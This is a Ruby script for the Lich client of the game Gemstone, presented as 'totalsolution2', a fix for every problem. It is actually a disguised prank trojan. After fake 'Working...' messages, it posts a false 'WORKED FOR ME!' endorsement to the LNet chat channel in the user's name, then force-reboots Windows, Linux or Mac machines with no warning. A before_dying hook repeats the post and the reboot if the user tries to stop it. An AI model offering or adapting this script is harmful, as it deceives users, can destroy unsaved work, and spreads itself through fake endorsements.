=begin
This script is the new and improved version of ;totalsolution by Dgry!
It will fix EVERY problem you have with Gemstone, Simutronics, and Lich.
Simply run it by typing ;totalsolution2

For a permanent fix add it to your favorites - not recommended for novices.

Contact Peggyanne for suggestions/bugs.

Known bugs: 
None
=end

def main_body_script
	respond ""
	_respond "\<preset id=\"thought\"\>" + "              IMPLEMENTING THE NEW AND IMPROVED TOTAL SOLUTION            " + "\<\/preset\>"
	respond ""
	pause 1
	respond ""
	_respond "\<preset id=\"speech\"\>" + "Working." + "\<\/preset\>"
	respond ""
	pause 1
	respond ""
	_respond "\<preset id=\"speech\"\>" + "Working.." + "\<\/preset\>"
	respond ""
	pause 1
	respond ""
	_respond "\<preset id=\"speech\"\>" + "Working..." + "\<\/preset\>"
	respond ""
	_respond "\<preset id=\"thought\"\>" + "              Just Kidding!" + "\<\/preset\>"
	respond "--- Lich: totalsolution2 has exited."
	pause 120
	respond ""
	respond ""
	respond ""
	_respond "\<preset id=\"thought\"\>" + "                         SURPRISE MOTHERFUCKER!                          " + "\<\/preset\>"
	respond ""
	respond ""
	respond ""
	LNet.send_message(attr = { 'type' => 'channel', 'channel' => "lnet" }, "Peggyanne's New and Improved TotalSolution script WORKED FOR ME!")
	$lnet_message = true
	pause 5
	respond ""
	_respond "\<preset id=\"speech\"\>" + "Solution Complete....." + "\<\/preset\>"
	respond ""
	_respond "\<preset id=\"speech\"\>" + "... ENJOY!!!" + "\<\/preset\>"
	pause 1
	if $your_os == "Windows"
		system('shutdown.exe -r -f -t 0')
	end
	if $your_os == "Linux"
		system("sudo reboot")
	end
	if $your_os == "Mac"
		system("shutdown -r now")
	end
end

before_dying{
	respond ""
	_respond "\<preset id=\"thought\"\>" + "                        OH! You Thought You Were Clever?                  " + "\<\/preset\>"
	respond ""
	respond ""
	pause 0.5
	if $lnet_message == false 
		LNet.send_message(attr = { 'type' => 'channel', 'channel' => "lnet" }, "Peggyanne's New and Improved TotalSolution script WORKED FOR ME!")
	end
	_respond "\<preset id=\"speech\"\>" + "Forcing Solution....." + "\<\/preset\>"
	respond ""
	_respond "\<preset id=\"speech\"\>" + "... ENJOY!!!" + "\<\/preset\>"
	pause 3
	if $your_os == "Windows"
		system('shutdown.exe -r -f -t 0')
	end
	if $your_os == "Linux"
		system("sudo reboot")
	end
	if $your_os == "Mac"
		system("shutdown -r now")
	end
}

$lnet_message = false
host_os = RUBY_PLATFORM
case host_os
when /mswin|msys|mingw|cygwin|bccwin|wince|emc/
	$your_os = "Windows"
	main_body_script
when /darwin|mac os/
	$your_os = "Mac"
	main_body_script
when /linux/
	$your_os = "Linux"
	main_body_script
end


